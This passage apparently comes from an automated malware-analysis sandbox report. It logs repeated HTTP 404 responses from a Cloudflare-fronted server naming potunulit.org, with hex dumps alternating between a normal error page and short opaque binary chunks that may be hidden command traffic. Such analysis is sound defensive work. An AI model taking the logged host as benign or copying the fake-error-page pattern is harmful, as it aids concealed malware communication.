70 9a a2 ce 57 a3 08 45 a1 1f d4 3c 62 91 9c 37 06 f1 2c 0e a4 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 fc 0b 8a 8b e1 a2 54 d7 9c 3c c2 e0 2b c7 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c eb 18 f5 52 48 44 0a 96 4d f1 e7 17 3f fe e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea Data Ascii: 4c7`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*[2HqY=`g@4o4];0j VKx Cm_hh]]lu3Ob>!ZC:>xwSSP*{~xsP$O
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jHGlEvJ6W4sarCqmhATE77tIP954SXVezQ8OeBWl18%2Fg9QO5BBvkLoYB828U3Hx8DRrxsEJHukSZchziuhd5IaR62lXqA08aKF11RJLkASNU5XrcWTDO5YaniIY%2BqrBD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce535326fe46901-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BaDtwb974HnQFaTwEb5%2Fc7Z7hqkpf3ybp6Y4Kcw4Yy4FrYdmmm4HAX4CYMxtCT6G7fKez3FA6YM3sLEWJ%2FaEyYpvxQFD4se9FBm8mRpyKQ7O0DFNrWziXTJ39hbyM3Iq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce5353348ca6901-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 31 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 01 d4 51 d6 fa 01 a1 67 f2 25 48 17 32 f7 29 10 69 9c 17 20 05 7d d4 b5 ca ac dd 34 0d 0a Data Ascii: 31Uys/~(u:RQg%H2)i }4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sRWn3wxWjCcIJoB0NgLNGlepo%2FGVB7CxjTVMHooK8cgtIfj55lhrXK5q5g8S6pCE0%2BAwi9236XJzyEpIyVDJBDMGEtmQUKcO1x44psxAEFmFD%2FFIYebe3aJgQafRRYwq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce53539df28bbc7-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kH5AcqsUhPISIi4TTiDf1wWzmO0xyGSAGEBHcOpuqBE4pPiy15rPw%2BapgS7NSLPR7%2Bt3LVwerWelNGz9oOwj9Ou9dOJagBlxMm%2B6oWS2lp%2BfJ4QtwEyDGnApX6mmRIGu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce5353b286cbbc7-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3a 4a 4e 32 e2 28 01 7c 89 0d 0a Data Ascii: 27Uys/~(`:I_Ny:JN2(|
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PqLP4aMd5JNjE%2BgHkJgDqGXtiIHFdFG2V7Z5GETsmA1ysYiClTHSs4VHS%2FLZpIkhQy5xTBK2kygZuRpZ92%2B47hAe7TlTq9dxqfbZjrjib4xpE5LnzfFU1oTfD2WJ4j1U"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce5354fe93a92a8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=40FqQMScMOH2k%2B3UZ6nVtfDaDXbrYdCn8cQWagKvq0SaQ%2BKdflyKx1LPYAhj22cGxP8uD85OI%2FSxaawQQ1wnsEkpL6QWvrD4cSen0%2BIr9x3s99rl%2F%2FG5pKbXN337TlRw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce53550ea4692a8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3KCIacPHlQD1DIUtcb8JX3F9DNAa5HGpOmhTZFTq7vqfE1Er9aIn%2Fz92px6sJJ5FgwyuoJACfn5r2SitZJc3KTcZO14Kt4q1qi1k5WaiPXrr98apsiYSiph%2BmuC5k8lQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce53577daf0bbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FynfnmQ5SgfQjcaXHUbYNeONNcBeQJY%2BldwIizMAtDVxY%2BRLTGPRi8g03lP1%2BVfy119tG4OY%2BoN1QQ2hmzF3K9xTcTYTHVlTnjQPVgvR8%2FHui2ZRaUMhK4Keul9j%2Fr%2FT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce53578dc30bbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 63 37 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 fd 05 9c 5b e4 9a 8a 32 48 ca 71 fe 94 59 ad 3d 0f cb 0e 1c 60 67 40 34 9c 7f 92 bf d5 a9 ab fd ad a4 6f 8b 34 81 cf 8a c8 b0 5d f2 3b ab c9 30 6a bc 20 b1 f3 f8 a5 e6 56 4b 78 13 b5 20 43 8d 6d 90 5f 68 ae 68 d5 9b 18 5d 5d 95 9e cb 81 1e bf 6c 13 d9 75 bc c0 84 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 9b 78 d4 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e 09 fd ff 78 c5 73 db c4 0d 13 13 86 50 e1 92 24 18 4f c5 03 c1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 da c5 96 be 21 51 61 ae 7d 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 9f b2 ee 0e c0 eb 7e 71 eb 40 db 1a 58 29 4b d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 1a b9 ae e3 cc 23 92 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 2b f8 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d ab 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 8d 21 d5 8e 82 11 e8 e4 1f 12 ab 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 08 45 a1 1f d4 3c 62 91 9c 37 06 f1 2c 0e a4 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 fc 0b 8a 8b e1 a2 54 d7 9c 3c c2 e0 2b c7 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c eb 18 f5 52 48 44 0a 96 4d f1 e7 17 3f fe e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 Data Ascii: 4c7`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*[2HqY=`g@4o4];0j VKx Cm_hh]]lu3Ob>!ZC:>xwSSP*{~xsP$Oa~i~]D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oDh9coMNDM%2FRvAcJzdtwypC5EUC0BjHGm6I27RhbXpu%2BecjytOwoPmvvXWw%2BhCLibl14LT49skCWXPmYgaoe49uuaNDj%2Fh25IMKJB8uENwQS8giCvk8%2FC8AGRV%2FdQv%2Fc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce5357c4891bbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FCwXIq7MGheoE2%2BJAbsPu4UyOjvuj%2FQhU6SnVnfn4JaY7fcrVUcyXIFKe%2Fv32FgtWXYN575PSzyiSHLRUCjrrJ%2BO3LPtUMc3hs1b2fg4ZujckWdL%2BXsXmUggTiGHCknN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce5357d0981bbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 31 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 01 d4 51 d6 fa 01 a1 67 f2 25 48 17 32 f7 29 10 69 9c 17 20 05 7d d4 b5 ca ac dd 34 0d 0a Data Ascii: 31Uys/~(u:RQg%H2)i }4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2AvliHPssinGsUAEvozU8YR0ICD4bEjyNxekg1T5XoKSczSUlF8IdkeC0Sn5%2FR%2FST8r89Mc%2FpRFghmfuofqcTzKmHwhSuOjKfjNRrpCt3JuXsNT1sTJYM9HD%2FLmR0RY7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce53581af2ebbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 May 2023 08:43:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vJK9qJQ%2FgFfldGscfje9Qn8DKgAhPzxKnExLlAtt53jhdyXLZn0RxwJlHFspFEr55uM9LNf%2BlYu7Wg8%2B5a0mzKpKNU8Gh69fiQmuBadePL83Mpf7qNKZIRLXU4kH%2Fq7%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ce535823fe2bbe6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3a 4a 4e 32 e2 28 01 7c 89 0d 0a Data Ascii: 27Uys/~(`:I_Ny:JN2(|
